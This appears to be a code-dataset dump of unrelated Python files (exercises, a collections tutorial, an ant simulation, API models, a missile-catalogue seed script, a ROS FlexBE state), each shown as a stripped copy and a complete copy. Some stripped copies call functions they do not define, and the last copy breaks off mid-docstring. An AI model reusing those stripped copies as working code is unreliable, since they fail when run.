    assert menu.command_to_list('xdg-open "/home/user/1983 - BVerfG - Volkszahlungsurteil - 1983.pdf"') == [u'xdg-open', u'/home/user/1983 - BVerfG - Volkszahlungsurteil - 1983.pdf']
def test_scan_binaries_file_in_system_path():
    """scan_binaries must still return a list when an entry of the
    (mocked) system path is a file rather than a directory."""
    with mock.patch.object(menu, 'system_path', new=lambda: [u'/bin', u'/bin/cp'] ):
        assert type(menu.scan_binaries()) == list
| 2,186 | 0 | 69 |
05663d5ebabfab987aea80e85ceb98316e7f9363 | 223 | py | Python | individual_22.py | HeartAttack417/labs2 | efc13855ebb2b096b08edf4215d054a097d1a257 | [
"MIT"
] | null | null | null | individual_22.py | HeartAttack417/labs2 | efc13855ebb2b096b08edf4215d054a097d1a257 | [
"MIT"
] | null | null | null | individual_22.py | HeartAttack417/labs2 | efc13855ebb2b096b08edf4215d054a097d1a257 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from math import pi
# NOTE(review): ring_area is not defined above in this (filtered) copy of the
# script, so this call would raise NameError -- confirm against the full source.
print(ring_area(5, 3))
| 14.866667 | 38 | 0.475336 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from math import pi
def ring_area(R, r):
    """Compute the area of an annulus with outer radius R and inner radius r.

    Returns the string 'Error' (the original sentinel value) for invalid
    radii, i.e. unless 0 <= r <= R.
    """
    if 0 <= r <= R:
        return pi * (R ** 2 - r ** 2)
    return 'Error'
# Demo: area of a ring with outer radius 5 and inner radius 3.
print(ring_area(5, 3))
| 96 | 0 | 25 |
1e7cd5441d75e159ca18198c76eb7e5786a50c12 | 1,869 | py | Python | ants.py | doug-letough/ants | feab4ae6857fa21d0f9addaf46fcccd7a20cd940 | [
"WTFPL"
] | null | null | null | ants.py | doug-letough/ants | feab4ae6857fa21d0f9addaf46fcccd7a20cd940 | [
"WTFPL"
] | null | null | null | ants.py | doug-letough/ants | feab4ae6857fa21d0f9addaf46fcccd7a20cd940 | [
"WTFPL"
] | null | null | null | #!/usr/bin/env python
# -*- coding:Utf-8 -*-
"""The ants module entry point.
"""
import config
import ant
import farm
import mine
import playground
import display
import logging
import random
import utils
__author__ = "Doug Le Tough"
__copyright__ = "Copyright 2017, Doug Le Tough"
__credits__ = ["Doug Le Tough",]
__license__ = "WTFPL"
__version__ = "1.0.0"
__maintainer__ = "Doug Le Tough"
__email__ = "doug.letough@free.fr"
__status__ = "Testing"
###################################################################################################################
# App
###################################################################################################################
# Entry point: build the simulation world, then launch the farm and the
# display in their own processes.
if __name__ == '__main__':
  # The display (runs in its own process; started last, below)
  disp = display.Display(config.PLAYGROUND_SIZE, config.FARM_INITIAL_FOOD_STOCK)
  # The FIFO queue to communicate with display
  display_q = disp.get_display_queue()
  # The queue needed to have response back from display to playground
  response_q = disp.get_response_queue()
  # Create the play ground shared by the farm, the mine and the ants
  ground = playground.Playground(config.PLAYGROUND_SIZE, response_q)
  # Create a food mine, offset (+50, +50) pixels from the farm position
  mine_position = (int(config.FARM_POS[0] + 50), int(config.FARM_POS[1] + 50))
  # NOTE(review): this rebinding shadows the imported `mine` module (likewise
  # `farm` below); harmless here since the modules are not used afterwards,
  # but worth renaming eventually.
  mine = mine.Mine(mine_position, config.MINE_RADIUS)
  # Add the mine to the playground
  ground.add_mine(mine)
  # Display the mine
  display_q.put(mine.to_dict())
  # Create the farm
  farm = farm.Farm(ground,
                   display_q,
                   config.FARM_POS,
                   config.FARM_GROWTH_RATE,
                   config.FARM_INITIAL_FOOD_STOCK,
                   config.FARM_SURVIVAL_TIMEOUT,
                   config.FARM_RADIUS)
  # Add farm to the playground
  ground.add_farm(farm)
  # Display farm
  display_q.put(farm.to_dict())
  # Start the farm own process
  farm.start()
  # Start the display own process
  disp.start()
| 30.145161 | 115 | 0.607277 | #!/usr/bin/env python
# -*- coding:Utf-8 -*-
"""The ants module entry point.
"""
import config
import ant
import farm
import mine
import playground
import display
import logging
import random
import utils
__author__ = "Doug Le Tough"
__copyright__ = "Copyright 2017, Doug Le Tough"
__credits__ = ["Doug Le Tough",]
__license__ = "WTFPL"
__version__ = "1.0.0"
__maintainer__ = "Doug Le Tough"
__email__ = "doug.letough@free.fr"
__status__ = "Testing"
###################################################################################################################
# App
###################################################################################################################
# Entry point: build the simulation world, then launch the farm and the
# display in their own processes.
if __name__ == '__main__':
  # The display (runs in its own process; started last, below)
  disp = display.Display(config.PLAYGROUND_SIZE, config.FARM_INITIAL_FOOD_STOCK)
  # The FIFO queue to communicate with display
  display_q = disp.get_display_queue()
  # The queue needed to have response back from display to playground
  response_q = disp.get_response_queue()
  # Create the play ground shared by the farm, the mine and the ants
  ground = playground.Playground(config.PLAYGROUND_SIZE, response_q)
  # Create a food mine, offset (+50, +50) pixels from the farm position
  mine_position = (int(config.FARM_POS[0] + 50), int(config.FARM_POS[1] + 50))
  # NOTE(review): this rebinding shadows the imported `mine` module (likewise
  # `farm` below); harmless here since the modules are not used afterwards,
  # but worth renaming eventually.
  mine = mine.Mine(mine_position, config.MINE_RADIUS)
  # Add the mine to the playground
  ground.add_mine(mine)
  # Display the mine
  display_q.put(mine.to_dict())
  # Create the farm
  farm = farm.Farm(ground,
                   display_q,
                   config.FARM_POS,
                   config.FARM_GROWTH_RATE,
                   config.FARM_INITIAL_FOOD_STOCK,
                   config.FARM_SURVIVAL_TIMEOUT,
                   config.FARM_RADIUS)
  # Add farm to the playground
  ground.add_farm(farm)
  # Display farm
  display_q.put(farm.to_dict())
  # Start the farm own process
  farm.start()
  # Start the display own process
  disp.start()
| 0 | 0 | 0 |
8916d7dddc0388e8fed8401c56cf19605144c021 | 194 | py | Python | exercicios curso em video/ex018.py | Nilton-Miguel/Prog_Python3 | 4cabcb1a30dde6ababce3cb8d1fbb7d417cb1d8b | [
"MIT"
] | null | null | null | exercicios curso em video/ex018.py | Nilton-Miguel/Prog_Python3 | 4cabcb1a30dde6ababce3cb8d1fbb7d417cb1d8b | [
"MIT"
] | null | null | null | exercicios curso em video/ex018.py | Nilton-Miguel/Prog_Python3 | 4cabcb1a30dde6ababce3cb8d1fbb7d417cb1d8b | [
"MIT"
] | null | null | null | from math import sin, cos, tan, radians
# Read an angle in degrees from the user and convert it to radians.
a = radians(float(input('informe o ângulo: ')))
# Print the sine, cosine and tangent of the angle, each to two decimal places.
print(' o seno é: {:.2f}\n o cosseno é: {:.2f}\n a tangente é: {:.2f}'.format(sin(a), cos(a), tan(a)))
| 48.5 | 103 | 0.608247 | from math import sin, cos, tan, radians
# Read an angle in degrees from the user and convert it to radians.
a = radians(float(input('informe o ângulo: ')))
# Print the sine, cosine and tangent of the angle, each to two decimal places.
print(' o seno é: {:.2f}\n o cosseno é: {:.2f}\n a tangente é: {:.2f}'.format(sin(a), cos(a), tan(a)))
| 0 | 0 | 0 |
420fa1fbc980f7660660c628ae98928c0adf0f74 | 1,464 | py | Python | tutorial/collection.py | luanxiangming/rqsts | 0bd3fa2fe64c71bf5702654de46e953d7a144847 | [
"Apache-2.0"
] | 2 | 2017-04-28T09:54:39.000Z | 2017-05-03T12:38:19.000Z | tutorial/collection.py | luanxiangming/rqsts | 0bd3fa2fe64c71bf5702654de46e953d7a144847 | [
"Apache-2.0"
] | null | null | null | tutorial/collection.py | luanxiangming/rqsts | 0bd3fa2fe64c71bf5702654de46e953d7a144847 | [
"Apache-2.0"
] | null | null | null | from collections import *
def collections_nametuple():
    """
    Demonstrate collections.namedtuple.

    namedtuple is a factory function that builds a custom tuple subclass
    with a fixed number of fields, whose elements can be accessed by
    attribute name instead of by index.
    """
    Point = namedtuple('Point', ['x', 'y'])
    p = Point(1, 2)
    print('p.x: ' + str(p.x))
    print('isInstance(p, Point): ' + str(isinstance(p, Point)))
    print('isInstance(p, tuple): ' + str(isinstance(p, tuple)))  # a Point instance is also a tuple (subclass)
    Circle = namedtuple('Circle', ['x', 'y', 'r'])
    circle = Circle(2, 2, 1)
    print('circle.r: ' + str(circle.r))
def collections_counter():
    """
    Demonstrate collections.Counter, a dict subclass that works as a tally.

    Counting the letters of 'Programming' shows that 'g', 'm' and 'r' each
    occur twice while every other character occurs once.
    """
    tally = Counter('Programming')
    print(tally)
    # most_common() yields (element, count) pairs, highest count first
    for element, count in tally.most_common():
        print(element, count)
    print('\n')
def collections_defaultdict():
    """
    Demonstrate collections.defaultdict.

    Missing keys receive a default produced by the factory callable that was
    supplied when the defaultdict was created.
    """
    table = defaultdict(lambda: 'N/A')
    table[0] = 1
    print(table[0])  # key present: stored value
    print(table[1])  # key missing: factory default
    print(table[2])  # key missing: factory default
# Run each demo in turn.
# NOTE(review): collections_ordereddict is not defined in this (filtered)
# copy of the module, so this call would raise NameError -- confirm the
# function exists in the full source.
collections_nametuple()
collections_ordereddict()
collections_counter()
collections_defaultdict()
| 21.850746 | 82 | 0.636612 | from collections import *
def collections_nametuple():
    """
    Demonstrate collections.namedtuple.

    namedtuple is a factory function that builds a custom tuple subclass
    with a fixed number of fields, whose elements can be accessed by
    attribute name instead of by index.
    """
    Point = namedtuple('Point', ['x', 'y'])
    p = Point(1, 2)
    print('p.x: ' + str(p.x))
    print('isInstance(p, Point): ' + str(isinstance(p, Point)))
    print('isInstance(p, tuple): ' + str(isinstance(p, tuple)))  # a Point instance is also a tuple (subclass)
    Circle = namedtuple('Circle', ['x', 'y', 'r'])
    circle = Circle(2, 2, 1)
    print('circle.r: ' + str(circle.r))
def collections_ordereddict():
    """
    Demonstrate OrderedDict: print a dict in insertion order, then ordered
    by key, then ordered by value.
    """
    sample = {'a': 1, 'c': 2, 'b': 3}
    for key, value in sample.items():
        print(key + ': ' + str(value))
    print('\n')
    # ordered by key
    by_key = OrderedDict(sorted(sample.items(), key=lambda pair: pair[0]))
    for key, value in by_key.items():
        print(key + ': ' + str(value))
    print('\n')
    # ordered by value
    by_value = OrderedDict(sorted(sample.items(), key=lambda pair: pair[1]))
    for key, value in by_value.items():
        print(key + ': ' + str(value))
    print('\n')
def collections_counter():
    """
    Demonstrate collections.Counter, a dict subclass that works as a tally.

    Counting the letters of 'Programming' shows that 'g', 'm' and 'r' each
    occur twice while every other character occurs once.
    """
    tally = Counter('Programming')
    print(tally)
    # most_common() yields (element, count) pairs, highest count first
    for element, count in tally.most_common():
        print(element, count)
    print('\n')
def collections_defaultdict():
    """
    Demonstrate collections.defaultdict.

    Missing keys receive a default produced by the factory callable that was
    supplied when the defaultdict was created.
    """
    table = defaultdict(lambda: 'N/A')
    table[0] = 1
    print(table[0])  # key present: stored value
    print(table[1])  # key missing: factory default
    print(table[2])  # key missing: factory default
# Run each demo in turn.
collections_nametuple()
collections_ordereddict()
collections_counter()
collections_defaultdict()
| 385 | 0 | 23 |
f0abad9215aed2e7afdafcb8b139d6cc861997dd | 1,258 | py | Python | backend/models/competitor.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 5 | 2020-02-02T14:58:15.000Z | 2022-01-07T08:24:37.000Z | backend/models/competitor.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 773 | 2020-01-04T22:54:01.000Z | 2022-03-31T16:07:56.000Z | backend/models/competitor.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 1 | 2021-12-25T14:32:25.000Z | 2021-12-25T14:32:25.000Z | from flask_restx import Model, fields
# REST API (Swagger) model describing a single Competitor record.
competitorModel = Model(
    "Competitor",
    {
        "id": fields.Integer(
            description="ID of the Competitor",
            example=7,
        ),
        "name": fields.String(
            description="Name of the Competitor",
            required=True,
            example="Fred Jones",
        ),
        "ageClass": fields.String(
            description="Age Class of the Competitor", example="M16", default=""
        ),
        "club": fields.String(
            description="Club of the Competitor", example="INT", default=""
        ),
        "course": fields.String(
            description="Course of the Competitor", example="Long", required=True
        ),
        "league": fields.String(
            description="League of the Competitor",
            example="(not) Sprintelope 2020",
            required=True,
        ),
    },
)
# REST API model for a merge request: results are transferred onto the
# competitor identified by `competitorKeep`, and `competitorMerge` is deleted.
competitorMergeModel = Model(
    "Competitor Merge",
    {
        "competitorKeep": fields.Integer(
            description="The ID of the Competitor to Keep and Transfer Result To",
            example=7,
        ),
        # Typo fix: description previously read "Competitior"
        "competitorMerge": fields.Integer(
            description="The ID of the Competitor to Delete", example=9
        ),
    },
)
| 28.590909 | 82 | 0.5469 | from flask_restx import Model, fields
# REST API (Swagger) model describing a single Competitor record.
competitorModel = Model(
    "Competitor",
    {
        "id": fields.Integer(
            description="ID of the Competitor",
            example=7,
        ),
        "name": fields.String(
            description="Name of the Competitor",
            required=True,
            example="Fred Jones",
        ),
        "ageClass": fields.String(
            description="Age Class of the Competitor", example="M16", default=""
        ),
        "club": fields.String(
            description="Club of the Competitor", example="INT", default=""
        ),
        "course": fields.String(
            description="Course of the Competitor", example="Long", required=True
        ),
        "league": fields.String(
            description="League of the Competitor",
            example="(not) Sprintelope 2020",
            required=True,
        ),
    },
)
# REST API model for a merge request: results are transferred onto the
# competitor identified by `competitorKeep`, and `competitorMerge` is deleted.
competitorMergeModel = Model(
    "Competitor Merge",
    {
        "competitorKeep": fields.Integer(
            description="The ID of the Competitor to Keep and Transfer Result To",
            example=7,
        ),
        # Typo fix: description previously read "Competitior"
        "competitorMerge": fields.Integer(
            description="The ID of the Competitor to Delete", example=9
        ),
    },
)
| 0 | 0 | 0 |
4920c07ffca83a5e8f40fa65e59790c3aa7f4d62 | 74 | py | Python | my_bot/__main__.py | ColinTheShark/async_modular | 9c359a97761e4ff50ee71c809b7af64eedac7053 | [
"MIT"
] | null | null | null | my_bot/__main__.py | ColinTheShark/async_modular | 9c359a97761e4ff50ee71c809b7af64eedac7053 | [
"MIT"
] | null | null | null | my_bot/__main__.py | ColinTheShark/async_modular | 9c359a97761e4ff50ee71c809b7af64eedac7053 | [
"MIT"
] | null | null | null | from .my_bot import My_Bot
# Run the bot only when the package is executed directly (python -m my_bot).
if __name__ == "__main__":
    My_Bot().run()
| 14.8 | 26 | 0.662162 | from .my_bot import My_Bot
# Run the bot only when the package is executed directly (python -m my_bot).
if __name__ == "__main__":
    My_Bot().run()
| 0 | 0 | 0 |
e08bca8e8b6a3d18942ada9c30818ad1a8c120ae | 5,861 | py | Python | catalog/lots_of_missiles.py | akshaym91/p5-itemcatalog | 203deca5b43952c0d19f8397d99c54bd903fbec3 | [
"MIT"
] | null | null | null | catalog/lots_of_missiles.py | akshaym91/p5-itemcatalog | 203deca5b43952c0d19f8397d99c54bd903fbec3 | [
"MIT"
] | null | null | null | catalog/lots_of_missiles.py | akshaym91/p5-itemcatalog | 203deca5b43952c0d19f8397d99c54bd903fbec3 | [
"MIT"
] | null | null | null | from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Country, Base, Missile, User
# Seed script: populate lots_of_missiles.db with sample users, countries and
# missiles for development and testing.
engine = create_engine('sqlite:///lots_of_missiles.db')
# Bind the engine to the metadata of the Base class so that the
# declaratives can be accessed through a DBSession instance
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# session.commit(). If you're not happy about the changes, you can
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# Create three dummy users that own the catalog entries created below.
user1 = User(name="Akshay Menon", email="makshay@somewhere.com",
             picture='http://lorempixel.com/200/200/people/1')
session.add(user1)
session.commit()
user2 = User(name="Sharath Kumar", email="sharath@kumar.com",
             picture='http://lorempixel.com/200/200/people/2')
session.add(user2)
session.commit()
user3 = User(name="Mithun Airani", email="mithun@home.com",
             picture='http://lorempixel.com/200/200/people/3')
session.add(user3)
session.commit()
# First country (India) and its missiles.
# NOTE: missile1..missile6 are reused as scratch variables throughout this
# script; each object is committed before its name is rebound.
firstCountry = Country(name="India", user_id=1)
session.add(firstCountry)
session.commit()
missile1 = Missile(name="Akash",
                   description="Surface to air missile.",
                   country=firstCountry,
                   link="https://en.wikipedia.org/wiki/Akash_(missile)",
                   user_id=1)
session.add(missile1)
session.commit()
missile2 = Missile(name="Nag",
                   description="Anti tank missile.",
                   country=firstCountry,
                   link="https://en.wikipedia.org/wiki/Nag_(missile)",
                   user_id=2)
session.add(missile2)
session.commit()
missile3 = Missile(name="Amogha Missile",
                   description="Anti tank missile.(under development)",
                   link="https://en.wikipedia.org/wiki/Amogha_missile",
                   country=firstCountry,
                   user_id=1)
session.add(missile3)
session.commit()
missile4 = Missile(name="Prithvi-I",
                   description="surface to surface Ballistic Missile",
                   link="https://en.wikipedia.org/wiki/Prithvi_(missile)#Prithvi_I",
                   country=firstCountry,
                   user_id=3)
session.add(missile4)
session.commit()
missile5 = Missile(name="Prithvi-II",
                   description="surface to surface Ballistic Missile",
                   link="https://en.wikipedia.org/wiki/Prithvi_(missile)#Prithvi_II",
                   country=firstCountry,
                   user_id=1)
session.add(missile5)
session.commit()
missile6 = Missile(name="Prithvi-III",
                   description="surface to surface Ballistic Missile",
                   link="https://en.wikipedia.org/wiki/Prithvi_(missile)#Prithvi_III",
                   country=firstCountry,
                   user_id=2)
session.add(missile6)
session.commit()
# Second country (United Kingdom) and its missiles.
secondCountry = Country(name="United Kingdom", user_id=1)
session.add(secondCountry)
session.commit()
missile1 = Missile(name="Bloodhound",
                   description="Surface to air missile.",
                   country=secondCountry,
                   link="https://en.wikipedia.org/wiki/Bristol_Bloodhound",
                   user_id=3)
session.add(missile1)
session.commit()
missile2 = Missile(name="Blowpipe",
                   description="Man portable Surface-to-air",
                   country=secondCountry,
                   link="https://en.wikipedia.org/wiki/Blowpipe_missile",
                   user_id=1)
session.add(missile2)
session.commit()
missile3 = Missile(name="Blue Steel",
                   description="Nuclear Stand Off Bomb",
                   link="https://en.wikipedia.org/wiki/Blue_Steel_missile",
                   country=secondCountry,
                   user_id=2)
session.add(missile3)
session.commit()
missile4 = Missile(name="Fairy Stooge",
                   description="anti-ship missile",
                   link="https://en.wikipedia.org/wiki/Fairey_Stooge",
                   country=secondCountry,
                   user_id=1)
session.add(missile4)
session.commit()
# Third country (Russia) and its missiles.
thirdCountry = Country(name="Russia", user_id=1)
session.add(thirdCountry)
session.commit()
missile5 = Missile(name="RT-21 Temp 2S",
                   description="mobile intercontinental ballistic missile (SS-16 Sinner)",
                   link="https://en.wikipedia.org/wiki/RT-21_Temp_2S",
                   country=thirdCountry,
                   user_id=3)
session.add(missile5)
session.commit()
missile6 = Missile(name="RT-21M Pioner",
                   description="mobile medium range ballistic missile (SS-20 Saber)",
                   link="https://en.wikipedia.org/wiki/RT-21M_Pioner",
                   country=thirdCountry,
                   user_id=3)
session.add(missile6)
session.commit()
missile5 = Missile(name="S-300P missille",
                   description="(SA-10 Grumble/SA-N-6/SA-20 Gargoyle/SA-X-21 Triumf)",
                   link="https://en.wikipedia.org/wiki/SA-10_Grumble",
                   country=thirdCountry,
                   user_id=1)
session.add(missile5)
session.commit()
missile6 = Missile(name="UR-100N",
                   description=" intercontinental ballistic missile (SS-19 Stiletto)",
                   link="https://en.wikipedia.org/wiki/UR-100N",
                   country=thirdCountry,
                   user_id=1)
session.add(missile6)
session.commit()
# NOTE(review): duplicate final commit; the second call is a harmless no-op.
session.commit()
| 34.680473 | 90 | 0.628903 | from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Country, Base, Missile, User
# Seed script: populate lots_of_missiles.db with sample users, countries and
# missiles for development and testing.
engine = create_engine('sqlite:///lots_of_missiles.db')
# Bind the engine to the metadata of the Base class so that the
# declaratives can be accessed through a DBSession instance
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# session.commit(). If you're not happy about the changes, you can
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# Create three dummy users that own the catalog entries created below.
user1 = User(name="Akshay Menon", email="makshay@somewhere.com",
             picture='http://lorempixel.com/200/200/people/1')
session.add(user1)
session.commit()
user2 = User(name="Sharath Kumar", email="sharath@kumar.com",
             picture='http://lorempixel.com/200/200/people/2')
session.add(user2)
session.commit()
user3 = User(name="Mithun Airani", email="mithun@home.com",
             picture='http://lorempixel.com/200/200/people/3')
session.add(user3)
session.commit()
# First country (India) and its missiles.
# NOTE: missile1..missile6 are reused as scratch variables throughout this
# script; each object is committed before its name is rebound.
firstCountry = Country(name="India", user_id=1)
session.add(firstCountry)
session.commit()
missile1 = Missile(name="Akash",
                   description="Surface to air missile.",
                   country=firstCountry,
                   link="https://en.wikipedia.org/wiki/Akash_(missile)",
                   user_id=1)
session.add(missile1)
session.commit()
missile2 = Missile(name="Nag",
                   description="Anti tank missile.",
                   country=firstCountry,
                   link="https://en.wikipedia.org/wiki/Nag_(missile)",
                   user_id=2)
session.add(missile2)
session.commit()
missile3 = Missile(name="Amogha Missile",
                   description="Anti tank missile.(under development)",
                   link="https://en.wikipedia.org/wiki/Amogha_missile",
                   country=firstCountry,
                   user_id=1)
session.add(missile3)
session.commit()
missile4 = Missile(name="Prithvi-I",
                   description="surface to surface Ballistic Missile",
                   link="https://en.wikipedia.org/wiki/Prithvi_(missile)#Prithvi_I",
                   country=firstCountry,
                   user_id=3)
session.add(missile4)
session.commit()
missile5 = Missile(name="Prithvi-II",
                   description="surface to surface Ballistic Missile",
                   link="https://en.wikipedia.org/wiki/Prithvi_(missile)#Prithvi_II",
                   country=firstCountry,
                   user_id=1)
session.add(missile5)
session.commit()
missile6 = Missile(name="Prithvi-III",
                   description="surface to surface Ballistic Missile",
                   link="https://en.wikipedia.org/wiki/Prithvi_(missile)#Prithvi_III",
                   country=firstCountry,
                   user_id=2)
session.add(missile6)
session.commit()
# Second country (United Kingdom) and its missiles.
secondCountry = Country(name="United Kingdom", user_id=1)
session.add(secondCountry)
session.commit()
missile1 = Missile(name="Bloodhound",
                   description="Surface to air missile.",
                   country=secondCountry,
                   link="https://en.wikipedia.org/wiki/Bristol_Bloodhound",
                   user_id=3)
session.add(missile1)
session.commit()
missile2 = Missile(name="Blowpipe",
                   description="Man portable Surface-to-air",
                   country=secondCountry,
                   link="https://en.wikipedia.org/wiki/Blowpipe_missile",
                   user_id=1)
session.add(missile2)
session.commit()
missile3 = Missile(name="Blue Steel",
                   description="Nuclear Stand Off Bomb",
                   link="https://en.wikipedia.org/wiki/Blue_Steel_missile",
                   country=secondCountry,
                   user_id=2)
session.add(missile3)
session.commit()
missile4 = Missile(name="Fairy Stooge",
                   description="anti-ship missile",
                   link="https://en.wikipedia.org/wiki/Fairey_Stooge",
                   country=secondCountry,
                   user_id=1)
session.add(missile4)
session.commit()
# Third country (Russia) and its missiles.
thirdCountry = Country(name="Russia", user_id=1)
session.add(thirdCountry)
session.commit()
missile5 = Missile(name="RT-21 Temp 2S",
                   description="mobile intercontinental ballistic missile (SS-16 Sinner)",
                   link="https://en.wikipedia.org/wiki/RT-21_Temp_2S",
                   country=thirdCountry,
                   user_id=3)
session.add(missile5)
session.commit()
missile6 = Missile(name="RT-21M Pioner",
                   description="mobile medium range ballistic missile (SS-20 Saber)",
                   link="https://en.wikipedia.org/wiki/RT-21M_Pioner",
                   country=thirdCountry,
                   user_id=3)
session.add(missile6)
session.commit()
missile5 = Missile(name="S-300P missille",
                   description="(SA-10 Grumble/SA-N-6/SA-20 Gargoyle/SA-X-21 Triumf)",
                   link="https://en.wikipedia.org/wiki/SA-10_Grumble",
                   country=thirdCountry,
                   user_id=1)
session.add(missile5)
session.commit()
missile6 = Missile(name="UR-100N",
                   description=" intercontinental ballistic missile (SS-19 Stiletto)",
                   link="https://en.wikipedia.org/wiki/UR-100N",
                   country=thirdCountry,
                   user_id=1)
session.add(missile6)
session.commit()
# NOTE(review): duplicate final commit; the second call is a harmless no-op.
session.commit()
| 0 | 0 | 0 |
dde91c0374d34e326519572f04e8b6cb7b12efe1 | 9,455 | py | Python | flexible_manipulation_flexbe_states/src/flexible_manipulation_flexbe_states/state_validation_state.py | ZiwenZhuang/flexible_manipulation | 052a6acf6791ed7a7dea06bf6073d9a52e96ce3e | [
"BSD-3-Clause"
] | 5 | 2019-05-15T07:14:15.000Z | 2020-09-01T06:56:56.000Z | flexible_manipulation_flexbe_states/src/flexible_manipulation_flexbe_states/state_validation_state.py | ZiwenZhuang/flexible_manipulation | 052a6acf6791ed7a7dea06bf6073d9a52e96ce3e | [
"BSD-3-Clause"
] | 2 | 2020-03-24T07:57:04.000Z | 2020-09-02T01:08:01.000Z | flexible_manipulation_flexbe_states/src/flexible_manipulation_flexbe_states/state_validation_state.py | ZiwenZhuang/flexible_manipulation | 052a6acf6791ed7a7dea06bf6073d9a52e96ce3e | [
"BSD-3-Clause"
] | 5 | 2019-04-27T23:25:25.000Z | 2020-09-02T01:08:18.000Z | #!/usr/bin/env python
import rospy
from flexbe_core import EventState, Logger
from flexbe_core.proxy import ProxyActionClient
from actionlib_msgs.msg import GoalStatus
from flexible_manipulation_msgs.msg import StateValidationAction, StateValidationGoal
from moveit_msgs.msg import Constraints, RobotState, ContactInformation, CostSource, ConstraintEvalResult
from flexible_manipulation_flexbe_states.proxy import ProxyMoveItClient
'''
Created on 05-Mar-2018
@author: David Conner, Julie Gates, and Jenny Gu
'''
class StateValidationState(EventState):
    '''
    State to validate a robot state using StateValidationAction.

    -- timeout        double   How long to wait for state validation
                                  (default: 5 seconds)
    -- wait_duration  double   How long to wait for action server (seconds) (0.0 waits indefinitely)
    -- action_topic   string   Topic name for the StateValidation action server
                                  (default: None --> Use user data)
    -- group_name     string   Group name for the StateValidation request
                                  (default: None --> Use user data)

    ># action_topic   string   Topic name for the StateValidation action server (if None )
    ># group_name     string   Name of the group to be used for query

    #> status_text    string   Status text for any errors

    <= valid          State has been validated.
    <= invalid        State is not valid given constraints
    <= failed         State has not been validated.
    '''

    def __init__(self, timeout=5.0, wait_duration=0.001, action_topic=None, group_name=None):
        '''
        Constructor (see class docstring for parameter semantics).
        '''
        super(StateValidationState, self).__init__(
            input_keys=['action_topic', 'group_name'],
            outcomes=['valid', 'invalid', 'failed'],
            output_keys=['status_text'])

        self.client = None
        self.wait_duration = wait_duration

        self.given_action_topic = action_topic
        if (self.given_action_topic is not None) and (len(self.given_action_topic) > 0):
            # If topic is defined, set the client up on startup
            self.client = ProxyActionClient({self.given_action_topic: StateValidationAction},
                                            self.wait_duration)
        else:
            self.given_action_topic = None  # handle empty string

        self.current_action_topic = self.given_action_topic

        self.group_name = group_name
        if self.group_name is not None and len(self.group_name) == 0:
            self.group_name = None  # handle empty string

        self.moveit_client = None
        try:
            self.moveit_client = ProxyMoveItClient(None)
        except Exception as e:
            Logger.logerr(" %s - exception on initialization of ProxyMoveItClient \n%s" % (self.name, str(e)))

        self.timeout_duration = rospy.Duration(timeout)
        # BUGFIX: initialize the timeout target so execute() cannot raise an
        # AttributeError if it runs before a goal has been sent; None disables
        # the timeout check.
        self.timeout_target = None
        self.return_code = None
        self.status_text = None

    def execute(self, userdata):
        '''
        Monitor the action client and map the result to an outcome.
        Returns None while the request is still pending.
        '''
        if self.return_code is not None:
            # Return any previously assigned return code if we are in pause
            userdata.status_text = self.status_text
            return self.return_code

        if self.client.has_result(self.current_action_topic):
            result = self.client.get_result(self.current_action_topic)
            if result.valid:
                self.return_code = 'valid'
                self.status_text = 'checked robot state is valid'
            else:
                self.return_code = 'invalid'
                self.status_text = 'checked robot state is not valid! number of contacts = %d' % (len(result.contacts))
            Logger.loginfo(self.status_text)
            userdata.status_text = self.status_text
            return self.return_code
        elif self.client.get_state(self.current_action_topic) == GoalStatus.ABORTED:
            # BUGFIX: was self.action_client, an attribute that does not exist;
            # the proxy is held in self.client.
            # TODO(review): confirm ProxyActionClient exposes get_goal_status_text.
            self.status_text = "StateValidation - %s request aborted by state validation action server\n %s" % (
                self.name, self.client.get_goal_status_text(self.current_action_topic))
            self.return_code = 'failed'
            Logger.logerr(self.status_text)
            userdata.status_text = self.status_text
            return self.return_code
        elif self.client.get_state(self.current_action_topic) == GoalStatus.REJECTED:
            # BUGFIX: removed the write to the undeclared userdata key 'valid'
            # (self.valid was never set) and fixed the format string, which had
            # one placeholder for two arguments.
            self.status_text = "StateValidation - %s request rejected by state validation action server\n %s" % (
                self.name, self.client.get_goal_status_text(self.current_action_topic))
            self.return_code = 'failed'
            Logger.logerr(self.status_text)
            userdata.status_text = self.status_text
            return self.return_code
        elif self.timeout_target is not None and rospy.Time.now() > self.timeout_target:
            self.status_text = "StateValidation - timeout waiting for %s to state validation (%f > %f (%f))" % (
                self.name, rospy.Time.now().to_sec(), self.timeout_target.to_sec(), self.timeout_duration.to_sec())
            self.return_code = 'failed'
            Logger.logerr(self.status_text)
            userdata.status_text = self.status_text
            return self.return_code
        # Normal monitoring - no result yet; stay in this state.
| 43.173516 | 211 | 0.618932 | #!/usr/bin/env python
import rospy
from flexbe_core import EventState, Logger
from flexbe_core.proxy import ProxyActionClient
from actionlib_msgs.msg import GoalStatus
from flexible_manipulation_msgs.msg import StateValidationAction, StateValidationGoal
from moveit_msgs.msg import Constraints, RobotState, ContactInformation, CostSource, ConstraintEvalResult
from flexible_manipulation_flexbe_states.proxy import ProxyMoveItClient
'''
Created on 05-Mar-2018
@author: David Conner, Julie Gates, and Jenny Gu
'''
class StateValidationState(EventState):
'''
State to validate state using StateValidationAction.
-- timeout double How long to wait for state validation
(default: 5 seconds)
-- wait_duration double How long to wait for action server (seconds) (0.0 waits indefinitely)
-- action_topic string Topic name for the StateValidation action server
(default: None --> Use user data)
-- group_name string Group name for the StateValidation request
(default: None --> Use user data)
># action_topic string Topic name for the StateValidation action server (if None )
